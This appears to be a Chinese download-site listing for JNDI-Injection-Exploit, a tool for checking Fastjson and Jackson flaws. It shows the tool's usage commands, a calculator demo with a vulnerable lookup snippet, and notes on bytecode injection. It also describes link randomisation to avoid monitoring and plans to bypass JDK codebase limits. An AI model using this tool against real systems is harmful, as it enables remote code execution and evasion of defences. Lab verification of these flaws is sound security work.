資料介紹
軟件簡介
JNDI-Injection-Exploit —— JNDI 注入利用工具,生成 JNDI 鏈接并啟動后端相關服務,可用于 Fastjson、Jackson 等相關漏洞的驗證。
使用
可執行程序為 jar 包,在命令行中運行以下命令:
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
其中:
-
-C?- 遠程 class 文件中要執行的命令。
(可選項 , 默認命令是 mac 下打開計算器,即"open /Applications/Calculator.app")
-
-A?- 服務器地址,可以是 IP 地址或者域名。
(可選項 , 默認地址是第一個網卡地址)
注意:
-
要確保?1099、1389、8180?端口可用,不被其他程序占用。
或者你也可以在 run.ServerStart 類 26~28 行更改默認端口。
-
命令會被作為參數傳入?Runtime.getRuntime().exec(),
所以需要確保命令傳入 exec() 方法可執行。
bash等可在shell直接執行的相關命令需要加雙引號,比如說 java -jar JNDI.jar -C "bash -c ..."
示例
本地演示:
-
啟動 JNDI-Injection-Exploit:
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"

我們需要把第一步中生成的 JNDI 鏈接注入到存在漏洞的應用環境中,方便解釋用如下代碼模仿漏洞環境:
public static void main(String[] args) throws Exception{
InitialContext ctx = new InitialContext();
ctx.lookup("rmi://127.0.0.1/fgf4fp");
}
當上面代碼運行后,應用便會執行相應命令,這里是彈出計算器,沒截圖,可以自己測一下。
截圖是工具的server端日志:

安裝
下面兩種方法都可以得到Jar包
-
從?Realease直接下載最新的Jar。
-
把源碼下載到本地然后自行編譯打包。(在Java1.7+ 、Java1.8+ 和 Maven 3.x+環境下測試可以)
$ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
$ cd JNDI-Injection-Exploit$ mvn clean package -DskipTests
工具實現
- 首先生成的鏈接后面codebaseClass是6位隨機的,這個是因為不希望讓工具生成的鏈接本身成為一種特征被監控或攔截。
- 服務器地址實際就是codebase地址,相比于marshalsec中的JNDI server來說,這個工具把JNDI server和HTTP server綁定到一起,并自動啟動HTTP server返回相應class,更自動化了。
- HTTP server基于jetty實現的,本質上是一個能下載文件的servlet,比較有意思的是我提前編譯好class模板放到resource目錄,然后servlet會讀取class文件,使用ASM框架對讀取的字節碼進行修改,然后插入我們想要執行的命令,返回修改后的字節碼。
待實現
- (已完成EL表達式繞過部分)在更高版本的 JDK 環境中 trustURLCodebase 變量為 false,限制了遠程類的加載,我會找時間把JNDI-Injection-Bypass這個項目的東西融入到本項目中,生成能繞過 JDK 限制 JNDI 鏈接。
- 常用串口通信測試工具sscom 4次下載
- 基于OTA升級的ESP01S固件測試工具 19次下載
- 可提升樣本程序軟件質量的自動化測試工具 19次下載
- modbus調試工具
- 藍牙調試工具BTool v1.40.5資源下載 30次下載
- 納米器件的測試工具資料下載
- USB-TTL測試工具應用程序免費下載 157次下載
- TC35短信收發測試工具下載 7次下載
- cpu性能測試工具(ORTHOS)中文版免費下載 0次下載
- 滲透測試工具開發 18次下載
- TCP/UDPDbg測試工具 329次下載
- 軟件測試工具的分類和使用 68次下載
- ICOM多串口卡測試工具
- TD-SCDMA測試工具體系及應用
- TD-SCDMA網絡測試工具及手段
- 嵌入式C/C++回歸測試四大最佳實踐(附自動化測試工具TESSY使用教程) 268次閱讀
- Linux下的stress-ng壓力測試工具介紹 1.3w次閱讀
- 多核應用調試工具CodeViser介紹 2k次閱讀
- T900串口測試工具的使用教程 4.3k次閱讀
- 命令執行不回顯利用工具解讀 2.8k次閱讀
- 測試工具的主要目的 1.9k次閱讀
- 如何使用DudeSuite進行滲透測試工作 2.9k次閱讀
- 基于安卓的滲透測試工具集 2.1k次閱讀
- 詳解半導體封裝測試工藝 2.3k次閱讀
- 滲透測試工具箱siusiu的特性及使用 3.7k次閱讀
- 一種開源滲透測試工具toxssin介紹 2.2k次閱讀
- 介紹一款功能強大的自動化Deauth滲透測試工具 1.9k次閱讀
- 常用藍牙調試工具分享 8.9k次閱讀
- 123個Python滲透測試工具你了解多少黑客資源 6.4k次閱讀
- 常用的軟件測試工具有哪些_10款常用的軟件測試工具推薦 7.7w次閱讀
下載排行
本周
- 1EMC PCB設計總結
- 0.33 MB | 6次下載 | 免費
- 2LLC變換器的原理特點與應用領域
- 1.54 MB | 1次下載 | 1 積分
- 3索尼14n 20n系列維修手冊
- 3.68 MB | 次下載 | 1 積分
- 4晶益微 JY6166 音頻codec驅動資料分享
- 0.73 MB | 次下載 | 免費
- 5晶益微 JY6311 音頻codec驅動資料分享
- 0.77 MB | 次下載 | 免費
- 6英集芯 IP5518V 集成MCU 的TWS耳機充電倉管理SoC數據手冊
- 8.35 MB | 次下載 | 免費
- 7英集芯 IP5518 集成MCU的TWS耳機充電倉管理SoC數據手冊
- 7.53 MB | 次下載 | 免費
- 8英集芯 IP5518H 集成MCU的30V高耐壓TWs耳機充電倉管理S0C數據手冊
- 8.33 MB | 次下載 | 免費
本月
- 1EMC PCB設計總結
- 0.33 MB | 6次下載 | 免費
- 2耗盡型MOS FET產品目錄選型表
- 0.14 MB | 4次下載 | 免費
- 3PD取電芯片 ECP5702規格書
- 0.88 MB | 4次下載 | 免費
- 4氮化鎵GaN FET/GaN HEMT 功率驅動電路選型表
- 0.10 MB | 2次下載 | 免費
- 52EDL05x06xx系列 600V半橋門驅動器帶集成自舉二極管(BSD)手冊
- 0.69 MB | 1次下載 | 免費
- 6TI系列-米爾TI AM62L核心板開發板-高能效低功耗嵌入式平臺
- 1.51 MB | 1次下載 | 免費
- 7PD取電芯片,可取5/9/12/15/20V電壓ECP5702數據手冊
- 0.88 MB | 1次下載 | 免費
- 8飛騰FT2000-4 COM Express核心板技術手冊0603
- 1.22 MB | 1次下載 | 免費
總榜
- 1matlab軟件下載入口
- 未知 | 935137次下載 | 10 積分
- 2開源硬件-PMP21529.1-4 開關降壓/升壓雙向直流/直流轉換器 PCB layout 設計
- 1.48MB | 420064次下載 | 10 積分
- 3Altium DXP2002下載入口
- 未知 | 233095次下載 | 10 積分
- 4電路仿真軟件multisim 10.0免費下載
- 340992 | 191457次下載 | 10 積分
- 5十天學會AVR單片機與C語言視頻教程 下載
- 158M | 183360次下載 | 10 積分
- 6labview8.5下載
- 未知 | 81606次下載 | 10 積分
- 7Keil工具MDK-Arm免費下載
- 0.02 MB | 73832次下載 | 10 積分
- 8LabVIEW 8.6下載
- 未知 | 65991次下載 | 10 積分
電子發燒友App





創作
發文章
發帖
提問
發資料
發視頻
上傳資料賺積分
評論